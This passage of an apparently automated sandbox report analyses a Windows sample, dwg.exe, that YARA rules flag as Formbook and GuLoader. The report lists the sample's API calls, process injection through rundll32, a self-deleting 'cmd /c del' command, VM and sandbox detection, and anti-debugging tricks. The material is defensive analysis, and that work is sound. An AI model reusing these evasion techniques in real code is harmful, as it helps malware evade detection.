      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044598F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044598A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044599D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A81E0 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8290 NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8310 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A83C0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A819A NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A81DC NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8235 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A828A NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A830B NtClose,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_00401348
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E266E30
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30D616
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312EF7
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311FF1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31DFCE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25841F
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30D466
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E240D20
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312D07
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311D55
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25D5E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3125DD
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3122AE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312B28
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27EBB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30DBD2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3003DA
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31E824
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301002
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3120A8
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B090
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3128EC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DD466
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442841F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1D55
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2D07
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04410D20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E25DD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DD616
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04436E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2EF7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044EDFCE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1FF1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1002
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044EE824
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E28EC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B090
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E20A8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFA2B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E22AE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AB40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2B28
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D03DA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DDBD2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444EBB0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00198C70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00198C6C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192D88
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AC73F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AC7B8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192FB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: String function: 1E24B150 appears 45 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0441B150 appears 54 times
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exe, 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exe, 00000000.00000002.247561257.0000000002130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs dwg.exe
      Source: dwg.exe, 00000000.00000002.248010737.0000000002960000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoveddrif.exeFE2XANTERIADGRIZZ vs dwg.exe
      Source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs dwg.exe
      Source: dwg.exe, 00000001.00000000.245755926.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exe, 00000001.00000002.312855043.000000001E4CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs dwg.exe
      Source: dwg.exe, 00000001.00000002.312005314.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs dwg.exe
      Source: dwg.exeBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@13/8
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
      Source: C:\Users\user\Desktop\dwg.exeFile created: C:\Users\user\AppData\Local\Temp\~DF888B9D52BBCA55F9.TMP
      Source: dwg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\dwg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: dwg.exeReversingLabs: Detection: 27%
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
      Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\dwg.exeProcess created: C:\Users\user\Desktop\dwg.exe 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\dwg.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: dwg.exe, 00000001.00000002.312554302.000000001E33F000.00000040.00000001.sdmp, rundll32.exe, 0000000D.00000002.493208853.000000000450F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: dwg.exe, rundll32.exe
      Source: Binary string: rundll32.pdb source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: rundll32.pdbGCTL source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmp
      Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000002.510174852.0000000007140000.00000002.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 5316, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 5316, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: dwg.exe PID: 1544, type: MEMORY
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165A66 push eax; ret
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E29D0D1 push ecx; ret
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565A66 push eax; ret
      Source: C:\Windows\explorer.exeCode function: 4_2_07410B20 push cs; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_07411BF3 push 75CE108Ch; ret
      Source: C:\Windows\explorer.exeCode function: 4_2_07415397 push ss; iretd
      Source: C:\Windows\explorer.exeCode function: 4_2_07411998 push ss; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_0741503B push ebx; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_07411CD9 push cs; retf
      Source: C:\Windows\explorer.exeCode function: 4_2_07412AEF push es; iretd
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0446D0D1 push ecx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A583D push 0000003Fh; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A533F push FFFFFF96h; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0019C32F push es; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB3D5 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB42B push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB422 push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AB48C push eax; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A5CD9 push C872E20Ah; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A5D64 push edx; ret
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001ACE0D push ss; retf
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0019CF58 push ecx; ret
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\dwg.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216587D LoadLibraryA,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056587D LoadLibraryA,
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002164B82 second address: 0000000002164B82 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021604FB second address: 00000000021604FB instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021639B6 second address: 00000000021639B6 instructions:
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\dwg.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: dwg.exe, 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, dwg.exe, 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE8
      Source: dwg.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002162C75 second address: 0000000002162C75 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov ecx, 00001000h 0x00000010 test dl, FFFFFFCAh 0x00000013 div ecx 0x00000015 cmp edx, 00000000h 0x00000018 jne 00007F84D4958ECEh 0x0000001a dec ebx 0x0000001b xor edx, edx 0x0000001d clc 0x0000001e mov eax, ebx 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000002164B82 second address: 0000000002164B82 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021604FB second address: 00000000021604FB instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000021639B6 second address: 00000000021639B6 instructions:
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 0000000000562C75 second address: 0000000000562C75 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov ecx, 00001000h 0x00000010 test dl, FFFFFFCAh 0x00000013 div ecx 0x00000015 cmp edx, 00000000h 0x00000018 jne 00007F84D4958ECEh 0x0000001a dec ebx 0x0000001b xor edx, edx 0x0000001d clc 0x0000001e mov eax, ebx 0x00000020 pushad 0x00000021 lfence 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeRDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 00000000001985F4 second address: 00000000001985FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\rundll32.exeRDTSC instruction interceptor: First address: 000000000019898E second address: 0000000000198994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B rdtsc
      Source: C:\Windows\explorer.exe TID: 6728Thread sleep time: -35000s >= -30000s
      Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
      Source: explorer.exe, 00000004.00000000.288554019.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
      Source: dwg.exe, 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, dwg.exe, 00000001.00000002.307279901.0000000000562000.00000040.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe8
      Source: explorer.exe, 00000004.00000000.275549634.0000000003710000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
      Source: explorer.exe, 00000004.00000000.275599179.000000000374F000.00000004.00000001.sdmpBinary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
      Source: explorer.exe, 00000004.00000000.275611265.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
      Source: explorer.exe, 00000004.00000000.275599179.000000000374F000.00000004.00000001.sdmpBinary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: E#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA36
      Source: dwg.exe, 00000001.00000003.269507023.0000000000A38000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
      Source: explorer.exe, 00000004.00000000.273584197.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
      Source: explorer.exe, 00000004.00000000.283148438.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
      Source: dwg.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
      Source: explorer.exe, 00000004.00000000.288625970.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
      Source: explorer.exe, 00000004.00000000.287839611.0000000008270000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
      Source: C:\Users\user\Desktop\dwg.exeProcess information queried: ProcessInformation

      Anti Debugging:

Contains functionality to hide a thread from the debugger
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_0216329B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,021653D5,02160484,2D9CC76C,DFCB8F12
Hides threads from debuggers
Source: C:\Users\user\Desktop\dwg.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\dwg.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\dwg.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\dwg.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\dwg.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\dwg.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_0216329B rdtsc
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02163A2C LdrInitializeThunk,
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02161E12 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02164AB9 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02164F41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02161FF8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02162C30 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_0216587D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02165866 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_021658D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 0_2_02161968 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E2FFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E24C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E278E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E301608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E27A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E25766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\dwg.exe | Code function: 1_2_1E26AE73 mov eax, dword ptr fs:[00000030h]
